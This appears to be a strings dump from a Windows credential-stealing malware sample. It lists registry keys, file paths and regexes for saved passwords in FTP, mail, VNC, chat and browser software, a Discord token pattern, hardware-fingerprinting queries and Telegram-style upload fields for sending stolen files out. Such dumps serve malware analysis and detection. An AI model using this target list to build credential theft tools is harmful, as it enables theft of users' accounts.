SmartFTP\Client 2.0\Favorites\Quick Connect
WS_FTP
Ipswitch\WS_FTP\Sites\ws_ftp.ini
FtpCommander
;User=
;Anonymous=
;Port=
;Password=
\Program Files (x86)\FTP Commander\Ftplist.txt
\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
\VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
\VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
\cftp\Ftplist.txt
;Server=
FTPGetter
<server>
\FTPGetter\servers.xml
<server_ip>
</server_ip>
<server_port>
</server_port>
<server_user_name>
</server_user_name>
<server_user_password>
</server_user_password>
The Bat!
\The Bat!
\Account.CFN
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Becky!
\Mailbox.ini
Account
PassWd
SMTPServer
MailAddress
HKEY_CURRENT_USER\Software\RimArts\B2\Settings
DataDir
Folder.lst
Outlook
9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\11.0\Outlook\Profiles
Software\Microsoft\Office\12.0\Outlook\Profiles
Software\Microsoft\Office\14.0\Outlook\Profiles
Software\Microsoft\Office\15.0\Outlook\Profiles
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles
IMAP Password
POP3 Password
HTTP Password
SMTP Password
Server
Windows Mail App
Software\Microsoft\ActiveSync\Partners
syncpassword
mailoutgoing
COMPlus_legacyCorruptedStateExceptionsPolicy
FoxMail
HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Executable
HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
FoxmailPath
\Storage\
\VirtualStore\Program Files\Foxmail\mail
\VirtualStore\Program Files (x86)\Foxmail\mail
\Accounts\Account.rec0
\Account.stg
POP3Host
SMTPHost
IncomingServer
POP3Password
Opera Mail
\Opera Mail\Opera Mail\wand.dat
opera:
ijklmno
vwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
PocoMail
\Pocomail\accounts.ini
POPPass
SMTPPass
eM Client
eM Client\accounts.dat
Accounts
"Username":"
"Secret":"
72905C47-F4FD-4CF7-A489-4E8121A155BD
"ProviderName":"
o6806642kbM7c5
Mailbird
SenderIdentities
\Mailbird\Store\Store.db
Server_Host
Username
EncryptedPassword
TightVNC
Software\TightVNC\Server
PasswordViewOnly
RealVNC 3.x
Software\ORL\WinVNC3
RealVNC 4.x
SOFTWARE\RealVNC\WinVNC4
TigerVNC
Software\TigerVNC\Server
SOFTWARE\RealVNC\vncserver
SOFTWARE\Wow6432Node\RealVNC\WinVNC4
TightVNC ControlPassword
ControlPassword
UltraVNC
\uvnc bvba\UltraVNC\ultravnc.ini
passwd
passwd2
ProgramFiles
\UltraVNC\ultravnc.ini
JDownloader 2.0
JDownloader 2.0\cfg
org.jdownloader.settings.AccountSettings.accounts.ejs
jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
Paltalk
Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
nickname
paltalk.com
Pidgin
\.purple\accounts.xml
<account>
<protocol>
</protocol>
<name>
</name>
<password>
</password>
Trillian
\Trillian\users\global\accounts.dat
trillian.im
MysqlWorkbench
\MySQL\Workbench\workbench_user_data.dat
Internet Downloader Manager
Software\DownloadManager\Passwords\
EncPassword
Discord
discord.com
Discord Token
[\w-]{24}\.[\w-]{6}\.[\w-]{27}
mfa\.[\w-]{84}
discordptb
discordcanary
Local Storage\leveldb
origin_url
username_value
Opera Stable
\Local State
"encrypted_key":"(.*?)"
\Login Data
\Default\Login Data
key4.db
metaData
nssPrivate
2a864886f70d0209
2a864886f70d010c050103
key3.db
global-salt
Version
password-check
Path=([A-z0-9\/\.\-]+)
[^\u0020-\u007F]
logins.json
\"(hostname|encryptedPassword|encryptedUsername)":"(.*?)"
signons.sqlite
moz_logins
hostname
encryptedUsername
encryptedPassword
Username:
Application:
Host:
Password:
<br><hr>
<br>Password:
<br>Application:
<br>Username:
Torch Browser
Torch\User Data
Orbitum
Orbitum\User Data
CentBrowser
CentBrowser\User Data
Chromium
Chromium\User Data
Epic Privacy
Epic Privacy Browser\User Data
Iridium Browser
Iridium\User Data
SeaMonkey
\Mozilla\SeaMonkey\
WaterFox
\Waterfox\
Citrio
CatalinaGroup\Citrio\User Data
K-Meleon
\K-Meleon\
Cool Novo
MapleStudio\ChromePlus\User Data
QIP Surf
QIP Surf\User Data
Coowon
Coowon\Coowon\User Data
Sputnik
Sputnik\Sputnik\User Data
BraveSoftware\Brave-Browser\User Data
Chedot
Chedot\User Data
IceDragon
\Comodo\IceDragon\
Yandex Browser
Yandex\YandexBrowser\User Data
Kometa
Kometa\User Data
BlackHawk
\NETGATE Technologies\BlackHawk\
Coccoc
CocCoc\Browser\User Data
360 Browser
360Chrome\Chrome\User Data
IceCat
\Mozilla\icecat\
Elements Browser
Elements Browser\User Data
Sleipnir 6
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
Liebao Browser
liebao\User Data
7Star\7Star\User Data
CyberFox
\8pecxstudios\Cyberfox\
Vivaldi
Vivaldi\User Data
Postbox
\Postbox\
uCozMedia\Uran\User Data
Firefox
\Mozilla\Firefox\
PaleMoon
\Moonchild Productions\Pale Moon\
Comodo Dragon
Comodo\Dragon\User Data
Opera Browser
Opera Software\Opera Stable
Edge Chromium
Microsoft\Edge\User Data
Chrome
Google\Chrome\User Data
Amigo\User Data
Thunderbird
\Thunderbird\
00061561
Berkelet DB
00000002
1.85 (Hash, version 2, native byte-order)
Unknow database format
SQLite format 3
UNIQUE
OBJECTIDENTIFIER
{0:X2}
INTEGER
OCTETSTRING
SEQUENCE {
Windows Credential
chrome
policy
{{{0}}}
sha512
ObjectLength
ChainingModeGCM
AuthTagLength
ChainingMode
KeyDataBlob
Microsoft Primitive Provider
:Zone.Identifier
SELECT * FROM Win32_Processor
win32_processor
processorID
13ad36db-4b9e-4166-a0ab-36d27af77e03
Win32_NetworkAdapterConfiguration
IPEnabled
MacAddress
f349be6d-68ab-4996-a9da-199a80a37ab4
Win32_BaseBoard
SerialNumber
0ac9f9db-0935-418e-b53e-48182f1b9395
chat_id
caption
yyyy-MM-dd HH-mm-ss
text/plain
sendDocument
document
---------------------------
multipart/form-data; boundary=
Content-Disposition: form-data; name="{0}"
Content-Disposition: form-data; name="{0}"; filename="{1}"
Content-Type: {2}
Version: 0x{0:X}
StorageSize: {0} (0x{0:X})
FormatID: {0}
Version is not equal to {0} ({1})
{D5CDD505-2E9C-101B-9397-08002B2CF9AE}
Size of the SerializedPropertyStore is less than {0} ({1})
Size of the SerializedPropertyStorage is less than 28 ({0})
Value: {0}
Type: {0}
Name: {0}
NameSize: {0} (0x{0:X})
ValueSize: {0} (0x{0:X})
Size of the StringName is not equal to {0} ({1})
Size of the StringName is less than 9 ({0})
Size of the NameSize is not equal to {0} ({1})
ID: 0x{0:X}
Size of the SerializedPropertyStore is less than 8 ({0})
StoreSize: {0} (0x{0X})
\Device\LanmanRedirector\
Failed to retrieve system handle information.
Accounts
logins
sha512
credential
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
1.0.0.0
InternalName
7f774f41-d19b-45d0-93bb-bcea6f138241.exe
LegalCopyright
OriginalFilename
7f774f41-d19b-45d0-93bb-bcea6f138241.exe
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0